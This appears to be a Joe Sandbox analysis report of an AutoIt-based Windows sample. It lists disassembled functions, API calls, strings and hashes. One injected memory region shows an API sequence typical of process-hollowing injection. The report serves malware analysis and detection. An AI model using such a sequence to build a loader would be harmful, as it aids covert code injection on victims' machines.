                                                                                                        control_flow_graph 1994 401100-401111 1995 401113-401119 1994->1995 1996 401179-401180 1994->1996 1998 401144-40114a 1995->1998 1999 40111b-40111e 1995->1999 1996->1995 1997 401182 1996->1997 2002 40112c-401141 DefWindowProcW 1997->2002 2000 401184-40118e call 401250 1998->2000 2001 40114c-40114f 1998->2001 1999->1998 2003 401120-401126 1999->2003 2011 401193-40119a 2000->2011 2004 401151-401157 2001->2004 2005 40119d 2001->2005 2003->2002 2007 42b038-42b03f 2003->2007 2008 401219-40121f 2004->2008 2009 40115d 2004->2009 2012 4011a3-4011a9 2005->2012 2013 42afb4-42afc5 call 40f190 2005->2013 2007->2002 2010 42b045-42b059 call 401000 call 40e0c0 2007->2010 2008->2003 2016 401225-42b06d call 468b0e 2008->2016 2014 401163-401166 2009->2014 2015 42b01d-42b024 2009->2015 2010->2002 2012->2003 2019 4011af 2012->2019 2013->2011 2021 42afe9-42b018 call 40f190 call 401a50 2014->2021 2022 40116c-401172 2014->2022 2015->2002 2020 42b02a-42b033 call 4370f4 2015->2020 2016->2011 2019->2003 2026 4011b6-4011d8 KillTimer call 401000 PostQuitMessage 2019->2026 2027 4011db-401202 SetTimer RegisterWindowMessageW 2019->2027 2020->2002 2021->2002 2022->2003 2031 401174-42afde call 45fd57 2022->2031 2027->2011 2029 401204-401216 CreatePopupMenu 2027->2029 2031->2002 2045 42afe4 2031->2045 2045->2011
                                                                                                        APIs
                                                                                                        • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                                                                                                        • KillTimer.USER32(?,00000001,?), ref: 004011B9
                                                                                                        • PostQuitMessage.USER32(00000000), ref: 004011CB
                                                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                                                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                                                                                                        • CreatePopupMenu.USER32 ref: 00401204
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                        • String ID: TaskbarCreated
                                                                                                        • API String ID: 129472671-2362178303
                                                                                                        • Opcode ID: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                                                                        • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                                                                                                        • Opcode Fuzzy Hash: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                                                                        • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E
                                                                                                        Function 004115D7 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 41COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 2046 4115d7-4115df 2047 4115ee-4115f9 call 4135bb 2046->2047 2050 4115e1-4115ec call 411988 2047->2050 2051 4115fb-4115fc 2047->2051 2050->2047 2054 4115fd-41160e 2050->2054 2055 411610-41163b call 417fc0 call 41130a 2054->2055 2056 41163c-411656 call 4180af call 418105 2054->2056 2055->2056
                                                                                                        APIs
                                                                                                        • _malloc.LIBCMT ref: 004115F1
                                                                                                          • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                                                          • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                                                          • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                                        • std::exception::exception.LIBCMT ref: 00411626
                                                                                                        • std::exception::exception.LIBCMT ref: 00411640
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                                                        • String ID: ,*H$4*H$@fI
                                                                                                        • API String ID: 615853336-1459471987
                                                                                                        • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                                                                        • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                                                                                                        • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                                                                        • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D
                                                                                                        Function 0454E638 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 2065 454e638-454e6e6 call 454c018 2068 454e6ed-454e713 call 454f548 CreateFileW 2065->2068 2071 454e715 2068->2071 2072 454e71a-454e72a 2068->2072 2073 454e865-454e869 2071->2073 2077 454e731-454e74b VirtualAlloc 2072->2077 2078 454e72c 2072->2078 2075 454e8ab-454e8ae 2073->2075 2076 454e86b-454e86f 2073->2076 2079 454e8b1-454e8b8 2075->2079 2080 454e871-454e874 2076->2080 2081 454e87b-454e87f 2076->2081 2084 454e752-454e769 ReadFile 2077->2084 2085 454e74d 2077->2085 2078->2073 2086 454e90d-454e922 2079->2086 2087 454e8ba-454e8c5 2079->2087 2080->2081 2082 454e881-454e88b 2081->2082 2083 454e88f-454e893 2081->2083 2082->2083 2090 454e895-454e89f 2083->2090 2091 454e8a3 2083->2091 2092 454e770-454e7b0 VirtualAlloc 2084->2092 2093 454e76b 2084->2093 2085->2073 2088 454e924-454e92f VirtualFree 2086->2088 2089 454e932-454e93a 2086->2089 2094 454e8c7 2087->2094 2095 454e8c9-454e8d5 2087->2095 2088->2089 2090->2091 2091->2075 2096 454e7b7-454e7d2 call 454f798 2092->2096 2097 454e7b2 2092->2097 2093->2073 2094->2086 2098 454e8d7-454e8e7 2095->2098 2099 454e8e9-454e8f5 2095->2099 2105 454e7dd-454e7e7 2096->2105 2097->2073 2101 454e90b 2098->2101 2102 454e8f7-454e900 2099->2102 2103 454e902-454e908 2099->2103 2101->2079 2102->2101 2103->2101 2106 454e7e9-454e818 call 454f798 2105->2106 2107 454e81a-454e82e call 454f5a8 2105->2107 2106->2105 2113 454e830 2107->2113 2114 454e832-454e836 2107->2114 2113->2073 2115 454e842-454e846 2114->2115 2116 454e838-454e83c CloseHandle 2114->2116 2117 454e856-454e85f 2115->2117 2118 454e848-454e853 VirtualFree 2115->2118 2116->2115 2117->2068 2117->2073 2118->2117
                                                                                                        APIs
                                                                                                        • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 0454E709
                                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0454E92F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1293200948.000000000454C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0454C000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_454c000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateFileFreeVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 204039940-0
                                                                                                        • Opcode ID: c69e8af538ca099f1199ea1a41374fe769c00d7324591793f5319154b009097c
                                                                                                        • Instruction ID: bdce655d83881d277c40ef0a8b5635274a4771f1de221faeaafd72e9181a933e
                                                                                                        • Opcode Fuzzy Hash: c69e8af538ca099f1199ea1a41374fe769c00d7324591793f5319154b009097c
                                                                                                        • Instruction Fuzzy Hash: 91A11870E00209EBDF14CFA4D899BEEB7B5BF88318F208559E511BB280D775AA41EF54
                                                                                                        Function 0040E4C0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79registryCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 2119 40e4c0-40e4e5 call 403350 RegOpenKeyExW 2122 427190-4271ae RegQueryValueExW 2119->2122 2123 40e4eb-40e4f0 2119->2123 2124 4271b0-4271f5 call 4115d7 call 43652f RegQueryValueExW 2122->2124 2125 42721a-42722a RegCloseKey 2122->2125 2130 427210-427219 call 436508 2124->2130 2131 4271f7-42720e call 402160 2124->2131 2130->2125 2131->2130
                                                                                                        APIs
                                                                                                        • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                                                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: QueryValue$CloseOpen
                                                                                                        • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                                        • API String ID: 1586453840-614718249
                                                                                                        • Opcode ID: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                                                                                        • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                                                                                                        • Opcode Fuzzy Hash: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                                                                                        • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768
                                                                                                        Function 00410570 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 2136 410570-4105f1 CreateWindowExW * 2 ShowWindow * 2
                                                                                                        APIs
                                                                                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                                                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                                                                        • ShowWindow.USER32(?,00000000), ref: 004105E4
                                                                                                        • ShowWindow.USER32(?,00000000), ref: 004105EE
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$CreateShow
                                                                                                        • String ID: AutoIt v3$edit
                                                                                                        • API String ID: 1584632944-3779509399
                                                                                                        • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                                                                        • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                                                                                                        • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                                                                        • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
                                                                                                        Function 0454E3C8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 160fileCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 2137 454e3c8-454e53b call 454c018 call 454e2b8 CreateFileW 2144 454e542-454e552 2137->2144 2145 454e53d 2137->2145 2148 454e554 2144->2148 2149 454e559-454e573 VirtualAlloc 2144->2149 2146 454e5f2-454e5f7 2145->2146 2148->2146 2150 454e575 2149->2150 2151 454e577-454e58e ReadFile 2149->2151 2150->2146 2152 454e590 2151->2152 2153 454e592-454e5cc call 454e2f8 call 454d2b8 2151->2153 2152->2146 2158 454e5ce-454e5e3 call 454e348 2153->2158 2159 454e5e8-454e5f0 ExitProcess 2153->2159 2158->2159 2159->2146
                                                                                                        APIs
                                                                                                          • Part of subcall function 0454E2B8: Sleep.KERNELBASE(000001F4), ref: 0454E2C9
                                                                                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0454E52E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1293200948.000000000454C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0454C000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_454c000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateFileSleep
                                                                                                        • String ID: 5PK3SF4HHMGJQIH57SYAMY
                                                                                                        • API String ID: 2694422964-1648254294
                                                                                                        • Opcode ID: 1a4e543e86c309f7bc600c2a9bfe54b6018ce2ecd0fd16e07a12f570267b7582
                                                                                                        • Instruction ID: e336c4f5b9bef61c53bbee68544db14d6c4da68f59de5e524c94f8719e82968a
                                                                                                        • Opcode Fuzzy Hash: 1a4e543e86c309f7bc600c2a9bfe54b6018ce2ecd0fd16e07a12f570267b7582
                                                                                                        • Instruction Fuzzy Hash: FC61D430D04248DBEF11DBE4D845BEEBB75AF59304F044199E208BB2C0D7BA1B44CBA6
                                                                                                        Function 00401B80 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                                                                                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                        • _wcsncpy.LIBCMT ref: 00401C41
                                                                                                        • _wcscpy.LIBCMT ref: 00401C5D
                                                                                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                                                                                                        • String ID: Line:
                                                                                                        • API String ID: 1874344091-1585850449
                                                                                                        • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                                                                        • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                                                                                                        • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                                                                        • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                                                                                                        Function 0040F250 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 66registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                                                                                                        • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                                                                                                        • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Close$OpenQueryValue
                                                                                                        • String ID: Control Panel\Mouse
                                                                                                        • API String ID: 1607946009-824357125
                                                                                                        • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                                                                        • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                                                                                                        • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                                                                        • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                                                                                                        Function 004102B0 Relevance: 7.6, APIs: 5, Instructions: 87COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                                                        • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                                                        • _wcsncpy.LIBCMT ref: 004102ED
                                                                                                        • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                                                        • _wcsncpy.LIBCMT ref: 00410340
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                                                                                                        • String ID:
                                                                                                        • API String ID: 3170942423-0
                                                                                                        • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                                                                        • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                                                                                                        • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                                                                        • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4
                                                                                                        Function 00475077 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 390COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ou
                                                                                                        • API String ID: 0-3837949563
                                                                                                        • Opcode ID: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                                                                        • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                                                                                                        • Opcode Fuzzy Hash: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                                                                        • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                                                                                                        Function 00475300 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 141COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                                                                                                        • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Process$CurrentTerminate
                                                                                                        • String ID: ou
                                                                                                        • API String ID: 2429186680-3837949563
                                                                                                        • Opcode ID: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                                                                                        • Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
                                                                                                        • Opcode Fuzzy Hash: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                                                                                        • Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
                                                                                                        Function 0454D2B8 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 0454DA73
                                                                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0454DB09
                                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0454DB2B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1293200948.000000000454C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0454C000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_454c000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                        • String ID:
